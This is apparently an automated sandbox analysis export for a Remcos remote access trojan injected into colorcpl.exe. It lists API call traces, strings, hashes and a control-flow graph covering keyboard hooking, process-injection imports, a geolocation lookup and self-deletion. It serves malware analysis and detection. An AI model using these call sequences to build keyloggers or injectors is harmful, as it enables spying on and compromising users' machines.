98281->97345 98282->98147 98283->98154 98287 466515c 101 API calls 98284->98287 98286 4665159 98287->98286 98288->98182 98289->98173 98290->98203 98291->98217 98292->98215 98293->98185 98294->98232 98298 4674553 98295->98298 98299 4674568 ___scrt_initialize_default_local_stdio_options 98298->98299 98302 469f79d 98299->98302 98305 469c4f0 98302->98305 98306 469c518 98305->98306 98307 469c530 98305->98307 98309 46a05dd __dosmaperr 20 API calls 98306->98309 98307->98306 98308 469c538 98307->98308 98311 469a7b7 _strftime 38 API calls 98308->98311 98310 469c51d 98309->98310 98322 469bcec 26 API calls std::_Deallocate 98310->98322 98313 469c548 98311->98313 98315 469cc76 _swprintf 20 API calls 98313->98315 98314 4694fcb TranslatorGuardHandler 5 API calls 98316 4674576 98314->98316 98317 469c5c0 98315->98317 98316->97338 98323 469d2e4 50 API calls 3 library calls 98317->98323 98319 469cce0 _swprintf 20 API calls 98321 469c528 98319->98321 98320 469c5cb 98320->98319 98321->98314 98322->98321 98323->98320 98325 4664ba0 WaitForSingleObject 98324->98325 98326 4664bcd recv 98324->98326 98343 4681076 56 API calls 98325->98343 98328 4664be0 98326->98328 98328->98266 98329 4664bbc SetEvent 98329->98328 98331 46620df 26 API calls 98330->98331 98340 4664cde 98331->98340 98332 4664e13 98333 4661fd8 26 API calls 98332->98333 98334 4664e1c 98333->98334 98334->98266 98335 4661fd8 26 API calls 98335->98340 98336 4661fc0 28 API calls 98338 4664dad CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 98336->98338 98337 46620f6 28 API calls 98337->98340 98338->98340 98344 4675aea 98338->98344 98339 46641a2 28 API calls 98339->98340 98340->98332 98340->98335 98340->98336 98340->98337 98340->98339 98341 4661fe2 28 API calls 98340->98341 98341->98340 98342->98271 98343->98329 98345 46620f6 28 API calls 98344->98345 98346 4675b0c SetEvent 98345->98346 98347 4675b21 98346->98347 98348 46641a2 28 API calls 98347->98348 98349 4675b3b 98348->98349 98350 46620f6 28 API calls 
98349->98350 98351 4675b4b 98350->98351 98352 46620f6 28 API calls 98351->98352 98353 4675b5d 98352->98353 98354 467be1b 28 API calls 98353->98354 98355 4675b66 98354->98355 98357 4675b86 GetTickCount 98355->98357 98358 4675ce5 98355->98358 98421 4675cc9 98355->98421 98356 4661e8d 26 API calls 98359 4677092 98356->98359 98360 467bb8e 28 API calls 98357->98360 98358->98421 98422 4675cf9 98358->98422 98361 4661fd8 26 API calls 98359->98361 98363 4675b97 98360->98363 98365 467709e 98361->98365 98366 467bae6 GetTickCount 98363->98366 98364 4675d01 98364->98421 98368 4661fd8 26 API calls 98365->98368 98367 4675ba3 98366->98367 98369 467bb8e 28 API calls 98367->98369 98370 46770aa 98368->98370 98371 4675bae 98369->98371 98372 467ba96 30 API calls 98371->98372 98373 4675bbc 98372->98373 98423 467bd1e 98373->98423 98376 4661e65 28 API calls 98377 4675bd8 98376->98377 98378 4662f31 28 API calls 98377->98378 98379 4675be6 98378->98379 98427 4662ea1 98379->98427 98382 4662f10 28 API calls 98383 4675c04 98382->98383 98384 4662ea1 28 API calls 98383->98384 98385 4675c13 98384->98385 98386 4662f10 28 API calls 98385->98386 98387 4675c1f 98386->98387 98388 4662ea1 28 API calls 98387->98388 98389 4675c29 98388->98389 98390 4664aa1 60 API calls 98389->98390 98391 4675c38 98390->98391 98392 4661fd8 26 API calls 98391->98392 98393 4675c41 98392->98393 98394 4661fd8 26 API calls 98393->98394 98395 4675c4d 98394->98395 98396 4661fd8 26 API calls 98395->98396 98397 4675c59 98396->98397 98398 4661fd8 26 API calls 98397->98398 98399 4675c65 98398->98399 98400 4661fd8 26 API calls 98399->98400 98401 4675c71 98400->98401 98402 4661fd8 26 API calls 98401->98402 98403 4675c7d 98402->98403 98404 4661f09 26 API calls 98403->98404 98405 4675c86 98404->98405 98406 4661fd8 26 API calls 98405->98406 98407 4675c8f 98406->98407 98408 4661fd8 26 API calls 98407->98408 98409 4675c98 98408->98409 98410 4661e65 28 API calls 98409->98410 98411 4675ca3 98410->98411 98412 469baac _strftime 42 API calls 
98411->98412 98413 4675cb0 98412->98413 98414 4675cb5 98413->98414 98415 4675cdb 98413->98415 98417 4675cc3 98414->98417 98418 4675cce 98414->98418 98416 4661e65 28 API calls 98415->98416 98416->98358 98436 4664ff4 98417->98436 98420 4664f51 104 API calls 98418->98420 98420->98421 98421->98356 98460 46650e4 83 API calls 98422->98460 98424 467bd2b 98423->98424 98425 46620b7 28 API calls 98424->98425 98426 4675bca 98425->98426 98426->98376 98433 4662eb0 98427->98433 98428 4662ef2 98429 4661fb0 28 API calls 98428->98429 98430 4662ef0 98429->98430 98431 4662055 26 API calls 98430->98431 98432 4662f09 98431->98432 98432->98382 98433->98428 98434 4662ee7 98433->98434 98461 4663365 28 API calls 98434->98461 98437 4665007 98436->98437 98438 46650c1 98436->98438 98437->98438 98439 466502b GetLocalTime 98437->98439 98440 466506a 98437->98440 98438->98421 98441 467bb8e 28 API calls 98439->98441 98440->98438 98442 4665082 GetLocalTime 98440->98442 98443 4665041 98441->98443 98444 467bb8e 28 API calls 98442->98444 98445 46652fd 28 API calls 98443->98445 98446 4665098 98444->98446 98447 466504e 98445->98447 98448 46652fd 28 API calls 98446->98448 98449 4662093 28 API calls 98447->98449 98450 46650a5 98448->98450 98451 4665059 98449->98451 98452 4662093 28 API calls 98450->98452 98453 467b4ef 79 API calls 98451->98453 98454 46650b0 98452->98454 98455 466505e 98453->98455 98456 467b4ef 79 API calls 98454->98456 98457 4661fd8 26 API calls 98455->98457 98458 46650b5 98456->98458 98457->98440 98459 4661fd8 26 API calls 98458->98459 98459->98438 98460->98364 98461->98430 98463->97413 98464->97439 98465->97440 98466->97428 98467->97432 98468->97438 98507 467d50f 98469->98507 98472 467d4f9 GetMessageA 98473 467d4e5 TranslateMessage DispatchMessageA 98472->98473 98474 467d50a 98472->98474 98473->98472 98477 466f7c2 98475->98477 98476 4673549 3 API calls 98476->98477 98477->98476 98479 466f866 98477->98479 98481 466f856 Sleep 98477->98481 98497 466f7f4 98477->98497 98478 466905c 28 API 
calls 98478->98497 98480 466905c 28 API calls 98479->98480 98484 466f871 98480->98484 98481->98477 98483 467bc5e 28 API calls 98483->98497 98485 467bc5e 28 API calls 98484->98485 98486 466f87d 98485->98486 98515 4673814 29 API calls 98486->98515 98489 4661f09 26 API calls 98489->98497 98490 466f890 98491 4661f09 26 API calls 98490->98491 98493 466f89c 98491->98493 98492 4662093 28 API calls 98492->98497 98494 4662093 28 API calls 98493->98494 98495 466f8ad 98494->98495 98498 467376f 29 API calls 98495->98498 98496 467376f 29 API calls 98496->98497 98497->98478 98497->98481 98497->98483 98497->98489 98497->98492 98497->98496 98513 466d096 111 API calls ___scrt_fastfail 98497->98513 98514 4673814 29 API calls 98497->98514 98499 466f8c0 98498->98499 98516 4672850 TerminateProcess WaitForSingleObject 98499->98516 98501 466f8c8 ExitProcess 98517 46727ee 61 API calls 98503->98517 98508 4696e90 ___scrt_fastfail 98507->98508 98509 467d526 RegisterClassExA 98508->98509 98510 467d481 ExtractIconA lstrcpynA Shell_NotifyIconA 98509->98510 98511 467d566 CreateWindowExA 98509->98511 98510->98472 98511->98510 98512 467d580 GetLastError 98511->98512 98512->98510 98514->98497 98515->98490 98516->98501

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0466A2D3
• SetWindowsHookExA.USER32(0000000D,0466A2A4,00000000), ref: 0466A2E1
• GetLastError.KERNEL32 ref: 0466A2ED
  • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0466A33B
• TranslateMessage.USER32(?), ref: 0466A34A
• DispatchMessageA.USER32(?), ref: 0466A355
Strings
• Keylogger initialization failure: error , xrefs: 0466A301
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error
• API String ID: 3219506041-952744263
• Opcode ID: 8cdc229b0267263d36e7e2dccb69e6bc6994d925b5f0afd34100932e34330125
• Instruction ID: 5cb951111b5fe0183d3db6244068e436ff98ec2f5dea13fac86ff1c443fe81ac
• Opcode Fuzzy Hash: 8cdc229b0267263d36e7e2dccb69e6bc6994d925b5f0afd34100932e34330125
• Instruction Fuzzy Hash: 8911A371A54341ABDB107FB9DC0986B77ECEBD6619B00052DF987E2140FA34E945CBA2
Uniqueness
• Uniqueness Score: -1.00%


APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0467B3A7
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0467B3BD
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0467B3D6
• InternetCloseHandle.WININET(00000000), ref: 0467B41C
• InternetCloseHandle.WININET(00000000), ref: 0467B41F
Strings
• http://geoplugin.net/json.gp, xrefs: 0467B3B7
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen$FileRead
• String ID: http://geoplugin.net/json.gp
• API String ID: 3121278467-91888290
• Opcode ID: 8a0ac5089841c8aaac5bb9e99203f2f65f6a620c03732c8c728700c0b83c23ea
• Instruction ID: 4999e6f3c14bda73637559968a706709d589e60438a2a42f0e708a68708e0447
• Opcode Fuzzy Hash: 8a0ac5089841c8aaac5bb9e99203f2f65f6a620c03732c8c728700c0b83c23ea
• Instruction Fuzzy Hash: 8211947150A3216BD724AA259C48DBB7FECEF86665F00053DF90592280EB64BC48C6F6
Uniqueness
• Uniqueness Score: -1.00%


APIs
  • Part of subcall function 04673549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 04673569
  • Part of subcall function 04673549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,046D52F0), ref: 04673587
  • Part of subcall function 04673549: RegCloseKey.KERNEL32(?), ref: 04673592
• Sleep.KERNEL32(00000BB8), ref: 0466F85B
• ExitProcess.KERNEL32 ref: 0466F8CA
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 4.9.4 Pro$override$pth_unenc
• API String ID: 2281282204-930821335
• Opcode ID: 9b93f2b68acc380ddbee1fe085ae528d59520cfc5add901d7a72a5ad32b1a307
• Instruction ID: b0610e99f90d1a5f4c75e2f6ed94cc0c23cd298db8ff3f15ac55c55370843b2f
• Opcode Fuzzy Hash: 9b93f2b68acc380ddbee1fe085ae528d59520cfc5add901d7a72a5ad32b1a307
• Instruction Fuzzy Hash: 2C210871F1030197F6087779886A6BE39A99B91619F50401CF41B473C4FE35BD4587EE
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 066E12E2
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000,?,?,?,00000000,?,?,?,00007463), ref: 066E12F2
• LoadLibraryA.KERNEL32(00082038,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 066E1439
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: AllocVirtual$LibraryLoad
• String ID:
• API String ID: 2441068224-0
• Opcode ID: 1139d058a2ab0270ae70c86ed3c0f96bdf73f9945fbfdf2b487f088f3a0b9c69
• Instruction ID: cdc6d47b384f28a8fa39979240c0782e987281868616c3b7a3fcb2abaedbcd73
• Opcode Fuzzy Hash: 1139d058a2ab0270ae70c86ed3c0f96bdf73f9945fbfdf2b487f088f3a0b9c69
• Instruction Fuzzy Hash: EAC18A71E01205AFEB64CF69CC84BAAF7B5FF46310F14816AE806AB755D730E911DB90
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetUserNameW.ADVAPI32(?,0466F223), ref: 0467B642
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 2da5f0c484be184e0a79c8afc6df0243bd8b5b848a203aceef572c509e7b85cb
• Instruction ID: a212aa3aa75feed684c2c620f89847088806f875be8e452d0a5ff4de32b2482e
• Opcode Fuzzy Hash: 2da5f0c484be184e0a79c8afc6df0243bd8b5b848a203aceef572c509e7b85cb
• Instruction Fuzzy Hash: 8401FF7190011CABDB04EBD4DC54AEDB7BCEF44309F10015AA506A6150FE746E89CB98
Uniqueness
• Uniqueness Score: -1.00%


APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0466E9E1), ref: 0467CB65
• GetProcAddress.KERNEL32(00000000), ref: 0467CB6E
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0466E9E1), ref: 0467CB85
• GetProcAddress.KERNEL32(00000000), ref: 0467CB88
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0466E9E1), ref: 0467CB9A
• GetProcAddress.KERNEL32(00000000), ref: 0467CB9D
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0466E9E1), ref: 0467CBAE
• GetProcAddress.KERNEL32(00000000), ref: 0467CBB1
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0466E9E1), ref: 0467CBC3
• GetProcAddress.KERNEL32(00000000), ref: 0467CBC6
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0466E9E1), ref: 0467CBD2
• GetProcAddress.KERNEL32(00000000), ref: 0467CBD5
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0466E9E1), ref: 0467CBE6
• GetProcAddress.KERNEL32(00000000), ref: 0467CBE9
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0466E9E1), ref: 0467CBFA
• GetProcAddress.KERNEL32(00000000), ref: 0467CBFD
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0466E9E1), ref: 0467CC0E
• GetProcAddress.KERNEL32(00000000), ref: 0467CC11
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0466E9E1), ref: 0467CC22
• GetProcAddress.KERNEL32(00000000), ref: 0467CC25
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0466E9E1), ref: 0467CC36
• GetProcAddress.KERNEL32(00000000), ref: 0467CC39
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0466E9E1), ref: 0467CC4A
• GetProcAddress.KERNEL32(00000000), ref: 0467CC4D
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0466E9E1), ref: 0467CC5E
• GetProcAddress.KERNEL32(00000000), ref: 0467CC61
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0466E9E1), ref: 0467CC72
• GetProcAddress.KERNEL32(00000000), ref: 0467CC75
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0466E9E1), ref: 0467CC83
• GetProcAddress.KERNEL32(00000000), ref: 0467CC86
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0466E9E1), ref: 0467CC97
• GetProcAddress.KERNEL32(00000000), ref: 0467CC9A
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0466E9E1), ref: 0467CCA7
• GetProcAddress.KERNEL32(00000000), ref: 0467CCAA
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0466E9E1), ref: 0467CCB7
• GetProcAddress.KERNEL32(00000000), ref: 0467CCBA
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0466E9E1), ref: 0467CCCC
• GetProcAddress.KERNEL32(00000000), ref: 0467CCCF
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0466E9E1), ref: 0467CCDC
• GetProcAddress.KERNEL32(00000000), ref: 0467CCDF
• GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0466E9E1), ref: 0467CCF0
• GetProcAddress.KERNEL32(00000000), ref: 0467CCF3
• GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0466E9E1), ref: 0467CD04
• GetProcAddress.KERNEL32(00000000), ref: 0467CD07
• LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0466E9E1), ref: 0467CD19
• GetProcAddress.KERNEL32(00000000), ref: 0467CD1C
• LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0466E9E1), ref: 0467CD29
• GetProcAddress.KERNEL32(00000000), ref: 0467CD2C
• LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0466E9E1), ref: 0467CD39
• GetProcAddress.KERNEL32(00000000), ref: 0467CD3C
• LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0466E9E1), ref: 0467CD49
• GetProcAddress.KERNEL32(00000000), ref: 0467CD4C
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$HandleModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 4236061018-3687161714
• Opcode ID: 9ab4500b460eb68e600e1e4ecbfa33c698a3e4ceed5d419f7edd0439b3eb7423
• Instruction ID: dc5c681ee124bfe64f78efcbd76cd2374b483e9b5fee25fe7e176ff26f1981e0
• Opcode Fuzzy Hash: 9ab4500b460eb68e600e1e4ecbfa33c698a3e4ceed5d419f7edd0439b3eb7423
• Instruction Fuzzy Hash: 574147E0E813587BDB10ABB66D8DD2B3EACD955A95341581BB508A7500FEBCBC00DFA4
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 5 466e9c5-466ea47 call 467cb50 GetModuleFileNameW call 466f3c3 call 46620f6 * 2 call 467be1b call 466fb17 call 4661e8d call 469fd00 22 466ea93-466eb5b call 4661e65 call 4661fab call 4661e65 call 466531e call 4666383 call 4661fe2 call 4661fd8 * 2 call 4661e65 call 4661fc0 call 4665aa6 call 4661e65 call 46651e3 call 4661e65 call 46651e3 5->22 23 466ea49-466ea8e call 466fbb3 call 4661e65 call 4661fab call 4670f37 call 466fb64 call 466f3b0 5->23 69 466ebae-466ebc9 call 4661e65 call 466b9bd 22->69 70 466eb5d-466eba8 call 4666c1e call 4661fe2 call 4661fd8 call 4661fab call 4673549 22->70 49 466eef2-466ef03 call 4661fd8 23->49 80 466ec03-466ec0a call 466d069 69->80 81 466ebcb-466ebea call 4661fab call 4673549 69->81 70->69 102 466f34f-466f36a call 4661fab call 46739a9 call 4672475 70->102 90 466ec13-466ec1a 80->90 91 466ec0c-466ec0e 80->91 81->80 98 466ebec-466ec02 call 4661fab call 46739a9 81->98 95 466ec1e-466ec2a call 467b2c3 90->95 96 466ec1c 90->96 94 466eef1 91->94 94->49 103 466ec33-466ec37 95->103 104 466ec2c-466ec2e 95->104 96->95 98->80 126 466f36f-466f3a0 call 467bc5e call 4661f04 call 4673a23 call 4661f09 * 2 102->126 107 466ec76-466ec89 call 4661e65 call 4661fab 103->107 108 466ec39 call 4667716 103->108 104->103 128 466ec90-466ed18 call 4661e65 call 467bc5e call 4661f13 call 4661f09 call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab 107->128 129 466ec8b call 4667755 107->129 117 466ec3e-466ec40 108->117 120 466ec42-466ec47 call 4667738 call 4667260 117->120 121 466ec4c-466ec5f call 4661e65 call 4661fab 117->121 120->121 121->107 141 466ec61-466ec67 121->141 157 466f3a5-466f3af call 466dd42 call 4674f2a 126->157 177 466ed80-466ed84 128->177 178 466ed1a-466ed33 call 4661e65 call 4661fab call 469bad6 128->178 129->128 141->107 144 466ec69-466ec6f 141->144 144->107 
147 466ec71 call 4667260 144->147 147->107 180 466ef06-466ef66 call 4696e90 call 466247c call 4661fab * 2 call 46736f8 call 4669057 177->180 181 466ed8a-466ed91 177->181 178->177 205 466ed35-466ed7b call 4661e65 call 4661fab call 4661e65 call 4661fab call 466da34 call 4661f13 call 4661f09 178->205 236 466ef6b-466efbf call 4661e65 call 4661fab call 4662093 call 4661fab call 467376f call 4661e65 call 4661fab call 469baac 180->236 184 466ed93-466ee0d call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 466cdf9 181->184 185 466ee0f-466ee19 call 4669057 181->185 192 466ee1e-466ee42 call 466247c call 4694798 184->192 185->192 212 466ee44-466ee4f call 4696e90 192->212 213 466ee51 192->213 205->177 215 466ee53-466ee9e call 4661f04 call 469f809 call 466247c call 4661fab call 466247c call 4661fab call 4673947 212->215 213->215 273 466eea3-466eec8 call 46947a1 call 4661e65 call 466b9bd 215->273 287 466efc1 236->287 288 466efdc-466efde 236->288 273->236 286 466eece-466eeed call 4661e65 call 467bc5e call 466f474 273->286 286->236 306 466eeef 286->306 289 466efc3-466efda call 467cd9b CreateThread 287->289 290 466efe4 288->290 291 466efe0-466efe2 288->291 294 466efea-466f0c6 call 4662093 * 2 call 467b4ef call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 469baac call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab StrToIntA call 4669de4 call 4661e65 call 4661fab 289->294 290->294 291->289 344 466f101 294->344 345 466f0c8-466f0ff call 46944ea call 4661e65 call 4661fab CreateThread 294->345 306->94 347 466f103-466f11b call 4661e65 call 4661fab 344->347 345->347 357 466f11d-466f154 call 46944ea call 4661e65 call 4661fab CreateThread 347->357 358 466f159-466f16c call 4661e65 call 4661fab 347->358 357->358 368 466f16e-466f1c7 call 4661e65 call 4661fab call 4661e65 call 4661fab call 466d9e8 call 4661f13 call 4661f09 
CreateThread 358->368 369 466f1cc-466f1df call 4661e65 call 4661fab 358->369 368->369 379 466f1e1-466f215 call 4661e65 call 4661fab call 4661e65 call 4661fab call 469baac call 466c162 369->379 380 466f21a-466f23e call 467b60d call 4661f13 call 4661f09 369->380 379->380 400 466f243-466f256 CreateThread 380->400 401 466f240-466f241 SetProcessDEPPolicy 380->401 404 466f264-466f26b 400->404 405 466f258-466f262 CreateThread 400->405 401->400 408 466f26d-466f277 CreateThread 404->408 409 466f279-466f280 404->409 405->404 408->409 412 466f282-466f285 409->412 413 466f28e 409->413 415 466f287-466f28c 412->415 416 466f2cc-466f2df call 4661fab call 46734ff 412->416 418 466f293-466f2bb call 4662093 call 46652fd call 4662093 call 467b4ef 413->418 415->418 425 466f2e4-466f2e7 416->425 433 466f2c0-466f2c7 call 4661fd8 418->433 425->157 427 466f2ed-466f32d call 467bc5e call 4661f04 call 467361b call 4661f09 call 4661f04 425->427 443 466f346-466f34b DeleteFileW 427->443 433->416 444 466f32f-466f332 443->444 445 466f34d 443->445 444->126 446 466f334-466f341 Sleep call 4661f04 444->446 445->126 446->443
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0466E9E1), ref: 0467CB65
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CB6E
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0466E9E1), ref: 0467CB85
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CB88
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0466E9E1), ref: 0467CB9A
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CB9D
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0466E9E1), ref: 0467CBAE
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CBB1
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0466E9E1), ref: 0467CBC3
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CBC6
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0466E9E1), ref: 0467CBD2
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CBD5
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0466E9E1), ref: 0467CBE6
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CBE9
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0466E9E1), ref: 0467CBFA
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CBFD
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0466E9E1), ref: 0467CC0E
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CC11
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0466E9E1), ref: 0467CC22
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CC25
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0466E9E1), ref: 0467CC36
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CC39
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0466E9E1), ref: 0467CC4A
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CC4D
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0466E9E1), ref: 0467CC5E
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CC61
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0466E9E1), ref: 0467CC72
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CC75
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0466E9E1), ref: 0467CC83
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 0466E9EE
                                                                                                                                • Part of subcall function 04670F37: __EH_prolog.LIBCMT ref: 04670F3C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                              • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\colorcpl.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                                                                                                              • API String ID: 2830904901-2432426600
